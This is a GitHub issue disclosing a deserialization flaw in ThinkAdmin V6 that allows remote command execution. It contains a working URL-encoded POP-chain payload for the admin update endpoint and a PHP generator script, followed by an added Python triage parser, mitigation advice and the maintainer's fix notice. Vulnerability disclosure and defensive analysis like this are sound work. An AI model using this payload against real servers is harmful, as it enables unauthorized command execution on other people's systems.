zoujingli / ThinkAdmin

A minimalist admin back-end based on ThinkPHP6, with built-in annotation-based permissions, asynchronous multi-tasking, an application plugin ecosystem and more; supports PaaS-style updates of shared modules and application plugins, and plugins can be customised and developed locally.
https://thinkadmin.top
MIT License
2.19k stars, 838 forks

Deserialization vulnerability in thinkadmin V6 #269

Closed J0o1ey closed 2 years ago

J0o1ey commented 2 years ago

A deserialization vulnerability was found in ThinkAdmin V6; this vuln can cause Remote Command Execution.

The deserialization vulnerability affects all versions from November 1, 2019 to June 16, 2020.

POC:

POST data to this URL: http://host/admin/login.html?s=admin/api.Update/tree

This POC will execute the command whoami:

rules=a%3A2%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A11%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A13%3A%22%00%2A%00connection%22%3Bs%3A5%3A%22mysql%22%3Bs%3A7%3A%22%00%2A%00name%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A11%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A13%3A%22%00%2A%00connection%22%3Bs%3A5%3A%22mysql%22%3Bs%3A7%3A%22%00%2A%00name%22%3Bs%3A0%3A%22%22%3Bs%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A9%3A%22%00%2A%00hidden%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A3%3A%22123%22%3B%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00field%22%3Ba%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00schema%22%3Ba%3A0%3A%7B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A9%3A%22%00%2A%00hidden%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A3%3A%22123%22%3B%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00field%22%3Ba%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00schema%22%3Ba%3A0%3A%7B%7D%7Di%3A1%3Bi%3A123%3B%7D


The POP chain is as follows.

A hacker can use this script to generate deserialization data to achieve remote code execution:

<?php
// Generator for the POP chain. On destruction think\Model runs save() ->
// updateData(); converting $name to a string hits __toString() (Conversion.php)
// on the nested Pivot, and the withAttr callback is applied to the attribute
// in $data, so "system" is called with "whoami".
namespace think;

use think\model\Pivot;

abstract class Model
{
    private $lazySave = false;      // __destruct() calls save() when true
    private $exists = false;        // save() takes the updateData() branch
    protected $connection;
    protected $name;                // string conversion => __toString() (Conversion.php) => Pivot
    private $withAttr = [];         // callable invoked on the attribute: "system"
    protected $hidden = [];
    private $data = [];             // attribute value, i.e. the command argument
    protected $withEvent = false;   // skip model events
    private $force = false;
    protected $field = [];
    protected $schema = [];

    function __construct()
    {
        $this->lazySave   = true;
        $this->exists     = true;
        $this->withEvent  = false;
        $this->force      = true;
        $this->connection = "mysql";
        $this->withAttr   = ["test" => "system"];
        $this->data       = ["test" => "whoami"];
        $this->hidden     = ["test" => "123"];
        $this->field      = [];
        $this->schema     = [];
    }
}

namespace think\model;

use think\Model;

class Pivot extends Model
{
    function __construct($obj = "")
    {
        parent::__construct();
        $this->name = $obj;         // the outer Pivot carries an inner Pivot here
    }
}

$a = new Pivot();
echo urlencode(serialize([new Pivot($a), 123]));
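
The following is an added triage example, not code from the issue or from ThinkAdmin. It rebuilds the posted POC byte for byte from the eleven properties the generator above sets (the sample is constructed from them; the page does not show the server-side code, so the script works on the posted `rules` value alone), then walks the serialized data with a small reader that never calls unserialize(), so no magic method can run, and reports which callable the withAttr/data pair would invoke. The names triage, has_objects, find_sinks and parse_php_serialized are mine.

```python
# Added example (not ThinkAdmin's or the reporter's code). The sample payload below
# is constructed: it rebuilds the issue's POC byte for byte from the properties it
# lists. The parser never calls unserialize(), so no __wakeup/__destruct can fire.
import re
from urllib.parse import quote_from_bytes, unquote_to_bytes

class PhpObject:                          # inert stand-in for an O:... token
    def __init__(self, cls, props):       # props: [(visibility, name, value), ...]
        self.cls, self.props = cls, props

def s(b):                                 # s:<len>:"<bytes>";  <len> counts BYTES
    return b's:%d:"%s";' % (len(b), b)
def priv(n):                              # private think\Model property -> "\0think\Model\0n"
    return s(b'\0think\\Model\0' + n)
def prot(n):                              # protected property -> "\0*\0n"
    return s(b'\0*\0' + n)

def pivot(name_value):                    # think\model\Pivot with the POC's 11 properties
    body = (priv(b'lazySave') + b'b:1;' + priv(b'exists') + b'b:1;'
            + prot(b'connection') + s(b'mysql') + prot(b'name') + name_value
            + priv(b'withAttr') + b'a:1:{' + s(b'test') + s(b'system') + b'}'
            + prot(b'hidden') + b'a:1:{' + s(b'test') + s(b'123') + b'}'
            + priv(b'data') + b'a:1:{' + s(b'test') + s(b'whoami') + b'}'
            + prot(b'withEvent') + b'b:0;' + priv(b'force') + b'b:1;'
            + prot(b'field') + b'a:0:{}' + prot(b'schema') + b'a:0:{}')
    return b'O:17:"think\\model\\Pivot":11:{' + body + b'}'

INNER = pivot(s(b''))                     # $a = new Pivot()   -> name = ""
OUTER = pivot(INNER)                      # new Pivot($a)      -> name = $a (an object)
POC = b'a:2:{i:0;' + OUTER + b'i:1;i:123;}'          # serialize([new Pivot($a), 123])
POC_FORM = quote_from_bytes(POC)          # the `rules=` value as it travels on the wire

def split_prop_name(raw):                 # undo PHP's key mangling (the %00 in the POC)
    if raw.startswith(b'\0'):
        _, scope, name = raw.split(b'\0', 2)
        return ('protected' if scope == b'*' else 'private(%s)' % scope.decode()), name.decode()
    return 'public', raw.decode()

def parse_php_serialized(data):
    """Minimal serialize()-format reader (b, i, s, a, O); objects become PhpObject."""
    pos = 0
    def until(ch):                        # bytes up to the next `ch`, consuming it
        nonlocal pos
        end = data.index(ch, pos)
        tok, pos = data[pos:end], end + 1
        return tok
    def string():                         # <len>:"<bytes>"  (type char already consumed)
        nonlocal pos
        n = int(until(b':'))
        raw = data[pos + 1:pos + 1 + n]
        pos += n + 2                      # skip opening and closing quote
        return raw
    def value():
        nonlocal pos
        t = data[pos:pos + 1]
        pos += 2                          # type char and ':'
        if t == b'b':
            return until(b';') == b'1'
        if t == b'i':
            return int(until(b';'))
        if t == b's':
            raw = string()
            pos += 1                      # trailing ';'
            return raw
        if t in (b'a', b'O'):
            cls = string().decode() if t == b'O' else None
            if cls is not None:
                pos += 1                  # ':' between class name and member count
            n = int(until(b':'))
            pos += 1                      # '{'
            items = [(value(), value()) for _ in range(n)]   # key, then value
            pos += 1                      # '}'
            if cls is None:
                return dict(items)
            return PhpObject(cls, [split_prop_name(k) + (v,) for k, v in items])
        raise ValueError('unsupported token %r at offset %d' % (t, pos))
    return value()

def find_sinks(v, sinks=None):            # withAttr[k] is called with data[k]: (class, fn, arg)
    sinks = [] if sinks is None else sinks
    if isinstance(v, PhpObject):
        props = {name: val for _, name, val in v.props}
        with_attr, data = props.get('withAttr'), props.get('data')
        if isinstance(with_attr, dict) and isinstance(data, dict):
            for k, fn in with_attr.items():
                if isinstance(fn, bytes) and isinstance(data.get(k), bytes):
                    sinks.append((v.cls, fn.decode(), data[k].decode()))
        v = {i: val for i, (_, _, val) in enumerate(v.props)}   # recurse into members
    if isinstance(v, dict):
        for val in v.values():
            find_sinks(val, sinks)
    return sinks

def has_objects(raw):                     # cheap gate: any O:<n>:" token instantiates a class
    return re.search(rb'(?:^|[;{])O:\d+:"', raw) is not None

def triage(form_value):                   # form_value: the URL-encoded `rules=` as posted
    raw = unquote_to_bytes(form_value)
    parsed = parse_php_serialized(raw)
    return has_objects(raw), parsed, find_sinks(parsed)
```

triage(POC_FORM) returns the gate result, the parsed tree (the outer Pivot's name property is itself a Pivot, which is the __toString() hop) and the sink list, here think\model\Pivot calling system with whoami, twice, once per object. has_objects() is the check to put in front of any unserialize() of request data, or in a WAF rule; on the PHP side the equivalent is to stop handing request data to unserialize() at all, or at least to pass ['allowed_classes' => false], which turns every O: token into __PHP_Incomplete_Class and leaves the chain nothing to run.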
zoujingli commented 2 years ago

Released vulnerability update.

zoujingli commented 2 years ago

https://www.oschina.net/news/120433

leewei233 commented 2 years ago

This is an automatic vacation reply from QQ Mail. Hello, your message has been received.
